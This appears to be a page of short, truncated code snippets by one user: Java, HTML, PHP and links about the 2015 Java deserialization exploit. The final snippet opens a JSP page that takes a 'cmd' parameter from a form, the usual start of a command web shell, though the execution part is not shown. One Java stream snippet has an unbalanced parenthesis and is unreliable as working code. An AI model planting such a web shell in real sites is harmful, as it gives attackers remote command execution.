farnulfo

map1
        *         
       *X*        
       *X *       
  S**** X  ***E   
        X         
        X         
                  
                  

farnulfo

import java.util.concurrent.LinkedBlockingQueue;
import java.util.concurrent.RejectedExecutionException;
import java.util.concurrent.Semaphore;
import java.util.concurrent.ThreadPoolExecutor;
import java.util.concurrent.TimeUnit;

import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

/**

farnulfo

http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/

http://fishbowl.pastiche.org/2015/11/09/java_serialization_bug/

http://www.infoq.com/news/2015/11/commons-exploit

http://www.slideshare.net/frohoff1/appseccali-2015-marshalling-pickles

https://jenkins-ci.org/content/mitigating-unauthenticated-remote-code-execution-0-day-jenkins-cli

farnulfo

<!doctype html>
<html>
<head>
    <title></title>
    <style>
        body {
            background: white;
            text-align: center;
            padding: 20px;
            font-family: Georgia, serif;

farnulfo

LocalDate now = LocalDate.now();
persons.stream()
       .filter(Person::isMale)
       .filter(p -> p.isAdult(now)
       .map(p -> p.getFirstName() + " " + p.getLastName())
       .collect(Collectors.toList());

farnulfo

    GitHub github = GitHub.connectAnonymously();
    GHRepository repository = github.getRepository("sass/node-sass");
    PagedIterable<GHRelease> listReleases = repository.listReleases();
    for(GHRelease release : listReleases.asList()) {
      List<GHAsset> assets = release.getAssets();
      for(GHAsset asset : assets.subList(0, 10)) {
        System.out.println(asset.getLabel());
        System.out.println(asset.getName());
        System.out.println(asset.getBrowserDownloadUrl());
      }

farnulfo

Using httpbin.org: https://httpbin.org/response-headers?Server=httpbin&Content-Type=text%2Fplain%3B+charset%3DUTF-8&Server-Timing=sql-1%3Bdesc%3D%22MySQL%20lookup%20Server%22%3Bdur%3D100%2Csql-2%3Bdur%3D900%3Bdesc%3D%22MySQL%20shard%20Server%20%231%22%2Cfs%3Bdur%3D600%3Bdesc%3D%22FileSystem%22%2Ccache%3Bdur%3D300%3Bdesc%3D%22Cache%22%2Cother%3Bdur%3D200%3Bdesc%3D%22Database%20Write%22%2Cother%3Bdur%3D110%3Bdesc%3D%22Database%20Read%22%2Ccpu%3Bdur%3D1230%3Bdesc%3D%22Total%20CPU%22

farnulfo

<?
/////////////////////
// slack2html
// by @levelsio
/////////////////////
//
/////////////////////
// WHAT DOES THIS DO?
/////////////////////
//

farnulfo

<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>